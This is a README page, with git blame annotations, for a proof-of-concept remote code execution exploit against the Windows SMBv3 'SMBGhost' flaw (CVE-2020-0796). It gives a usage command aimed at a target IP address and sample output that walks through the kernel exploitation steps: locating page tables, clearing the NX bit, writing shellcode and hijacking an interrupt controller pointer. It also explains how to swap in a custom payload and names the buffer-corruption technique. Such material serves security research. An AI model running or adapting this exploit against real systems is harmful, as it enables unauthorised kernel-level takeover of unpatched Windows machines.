README.md 1.5 KB
Newer Older
C
chompie1337 已提交
1 2
# SMBGhost_RCE_PoC

C
chompie1337 已提交
3 4
RCE PoC for CVE-2020-0796 "SMBGhost"

C
poc  
chompie 已提交
5
For demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die. 
C
chompie1337 已提交
6

C
poc  
chompie 已提交
7
Now that that's out of the way....
C
chompie1337 已提交
8

C
poc  
chompie 已提交
9 10
Usage ex: 

C
chompie1337 已提交
11 12
``` 
$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131
C
poc  
chompie 已提交
13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff79480000000
[+] ntoskrnl entry at fffff80645792010
[+] found PML4 self-ref entry 1eb
[+] found HalpInterruptController at fffff79480001478
[+] found HalpApicRequestInterrupt at fffff80645cb3bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000a00!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...
```

Replace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself. 

lznt1 code from [here](https://github.com/you0708/lznt1). Modified to add a "bad compression" function to corrupt SRVNET buffer
C
chompie1337 已提交
31 32
header without causing a crash.

C
poc  
chompie 已提交
33
See this excellent write up by Ricera Security for more details on the methods I used: 
C
chompie1337 已提交
34 35
https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html